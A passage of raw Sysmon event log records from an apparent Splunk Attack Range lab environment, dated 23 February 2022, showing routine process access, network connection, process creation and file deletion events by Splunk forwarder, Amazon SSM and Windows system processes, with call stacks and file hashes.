Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78F389F49CC59D1DA3C8B6D2BD4C9D2B,SHA256=06FA5D70027F85D3D24113C4C28FD8BA9EDF592B5DE5E093C5D7E7EB54E48F34,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:43.646{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51244-false10.0.1.12-8000- 23542300x8000000000000000215232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:46.069{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-126MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:46.035{4F8D34B0-0FA5-6216-2004-000000003902}1844920C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215266Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FA7-6216-2204-000000003902}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215265Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215264Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215263Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215262Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215261Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215260Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215259Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215258Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215257Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215256Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0FA7-6216-2204-000000003902}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215255Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.897{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FA7-6216-2204-000000003902}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215254Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.899{4F8D34B0-0FA7-6216-2204-000000003902}3080C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215253Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.788{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3614811B6CC557040C8077F728A211DA,SHA256=6AFAF59B0E9E71F85F24E69ABF1DA323599645881C204CF1CFE53F638C1B105F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:47.164{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=094913EA0F574FF956EE8A2A4A8641B9,SHA256=0963802D4A5B96EB29C4EAA3D07A24924088E82F5954DA0FB829A15F1F4D098C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215252Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.585{4F8D34B0-0FA7-6216-2104-000000003902}24642284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215251Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FA7-6216-2104-000000003902}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215250Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215249Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215248Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215247Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215246Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215245Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 